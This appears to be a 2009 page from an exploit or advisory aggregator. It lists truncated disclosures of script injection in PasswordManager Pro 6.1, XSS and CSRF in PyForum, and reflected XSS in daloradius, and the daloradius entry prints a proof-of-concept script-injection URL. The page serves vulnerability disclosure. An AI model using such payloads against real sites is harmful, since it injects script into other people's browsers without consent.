Home » 2009 » December » 16
PasswordManager Pro 6.1 Script Injection Vulnerability
PasswordManager Pro 6.1 Script Injection Vulnerability
scip AG Vulnerability ID 4063 (12/15/2009)
http://www.scip.ch/?vuldb.4063


I. INTRODUCTION

"Password Manager Pro is a secure vault for storing and managing shared
sensitive information such as passwords, documents and digital
identities of enterprises."

More information is available on the official product web site at the
following URL[1]:

http://www.manageengine.com/products/passwordmanagerpro/


II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.

The processing method for the search function fails to perform proper
input validation on the data that is be ... Read more »
Views: 4306 | Added by: b1zz4rd | Date: 16 December 2009 | Comments (0)

[BMSA-2009-08] Multiple Vulnerabilities in PyForum
BLUE MOON SECURITY ADVISORY 2009-08
===================================


:Title: Multiple Vulnerabilities in PyForum
:Severity: Critical
:Reporter: Hoang Quoc Thinh and Blue Moon Consulting
:Products: PyForum v1.0.3
:Fixed in: --


Description
-----------

PyForum is a 100% python-based message board system based in the excellent web2py framework.

We have discovered cross site scripting and cross site request forgery vulnerabilities in PyForum. The first allows arbitrary script to run when a post is viewed. The second allows attackers to submit forms (such as changing password) automatically without user's knowledge.

XSS vulnerability lies in the BBcode parsing in module ``models.parser``. The ``img`` and ``url`` tags do not sanitize inputs and hence are susceptible to script injection.

CSRF vulnerability lies in the design of this web application. Forms do not have secu ... Read more »
Views: 8472 | Added by: b1zz4rd | Date: 16 December 2009 | Comments (0)

Daloradius XSS Vulnerability
##############################
#############
#
# Script Name : daloradius ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/daloradius/
#

###########################################

PoC :

http://[target]/[path]/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

local Example :

... Read more »
Views: 861 | Added by: b1zz4rd | Date: 16 December 2009 | Comments (0)

close